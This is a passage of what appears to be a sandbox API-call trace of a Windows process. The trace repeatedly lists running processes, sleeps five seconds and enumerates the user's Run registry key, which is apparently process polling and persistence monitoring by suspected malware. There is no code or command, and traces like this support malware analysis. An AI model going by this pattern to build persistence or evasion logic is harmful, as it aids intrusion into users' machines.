(ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.342] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.342] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.343] NtClose (Handle=0x154) returned 0x0 [0186.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.346] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.358] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.358] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.358] NtClose (Handle=0x154) returned 0x0 [0186.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.363] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.377] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.377] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.378] NtClose (Handle=0x154) returned 0x0 [0186.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.384] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.389] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.389] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.389] NtClose (Handle=0x154) returned 0x0 [0186.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.393] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.405] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.405] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.405] NtClose (Handle=0x154) returned 0x0 [0186.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.410] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.421] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.421] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.421] NtClose (Handle=0x154) returned 0x0 [0186.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.425] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.436] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.436] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.436] NtClose (Handle=0x154) returned 0x0 [0186.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.440] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.452] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.453] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.453] NtClose (Handle=0x154) returned 0x0 [0186.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.457] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.467] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.468] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.468] NtClose (Handle=0x154) returned 0x0 [0186.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.477] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.484] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.484] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.484] NtClose (Handle=0x154) returned 0x0 [0186.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.489] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.498] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.499] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.499] NtClose (Handle=0x154) returned 0x0 [0186.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.504] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.514] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.514] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.514] NtClose (Handle=0x154) returned 0x0 [0186.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.519] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.530] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.530] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.530] NtClose (Handle=0x154) returned 0x0 [0186.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.534] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.546] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, 